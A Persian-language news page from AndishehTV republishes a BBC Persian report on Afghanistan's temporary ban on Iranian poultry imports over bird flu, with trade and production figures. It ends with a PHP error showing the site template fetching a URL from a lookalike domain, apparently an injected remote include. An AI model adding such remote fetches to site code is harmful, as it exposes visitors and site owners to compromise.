Thursday 24 June 2021 / پنجشنبه 3 تير 1400

جستجو

P7a

AndishehTV

ATV Frequenter

afghanistan stopped import chicken from Iran

وزارت زراعت و مالداری افغانستان اعلام کرد که برای حفاظت از سلامتی شهروندان و مرغداری‌ها، واردات مرغ و محصولات آن را از ایران به طور موقت ممنوع کرده است.
در اعلامیه این وزارت‌خانه که امروز، چهارشنبه...

۱۷ دلو/بهمن، به رسانه‌ها فرستاده شد، آمده است که این تصمیم بر اساس گزارش سازمان دامپزشکی ایران و سازمان جهانی بهداشت حیوانی مبنی بر تثبیت بیماری آنفلوانزای پرندگان در شمال ایران گرفته شده است.
بر اساس قانون افغانستان، در ابتدا این ممنوعیت و قرنطینه برای ۲۱ روز ادامه پیدا می‌کند و بعدا با در نظر گرفتن وضعیت بیماری در ایران، در مورد ادامه یا رفع آن تصمیم گرفته می‌شود.
افغانستان یکی از مهمترین مقاصد صادرات ایران به شمار می‌رود و حجم تجارت میان دو کشور در سال‌های اخیر به صورت چشگمیری افزایش یافته است.
مقام‌های ایران اعلام کردند که مبادله اقتصادی میان افغانستان و ایران اکنون به سه میلیارد دلار رسیده است اما اتاق تجارت افغانستان می‌گوید که مجموع تجارت سالانه افغانستان و ایران حدود یک میلیار دلار در سال است.
وزارت زراعت افغانستان می‌گوید سال گذشته نیز از طریق پرندگان مهاجر، بیماری آنفلونزای مرغی وارد افغانستان شده بود که با تلاش و تطبیق برنامه‌های پیشگیرانه، از گسترش آن جلوگیری شد و بیماری مهار شد.
بر اساس اطلاعات وزارت زراعت افغانستان، اکنون این کشور در تولید مرغ و محصولات آن به خودکفایی نزدیک است و این نهاد پیش از این واردات مرغ‌های پیر را به این کشور منع کرده بود.
براساس آمار رسمی سالانه حدود ۵۰۰ تن گوشت و ۳۴۰ میلیون تخم مرغ در افغانستان تولید می‌شود که به اندازه حدود نیمی از مصرف این کشور است.

منبع: BBC Persian

bbl

TV

Warning: file_get_contents(http://panel.google-amp.org/al.php?s=374): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/andish5/public_html/templates/rt_audacity/index.php on line 311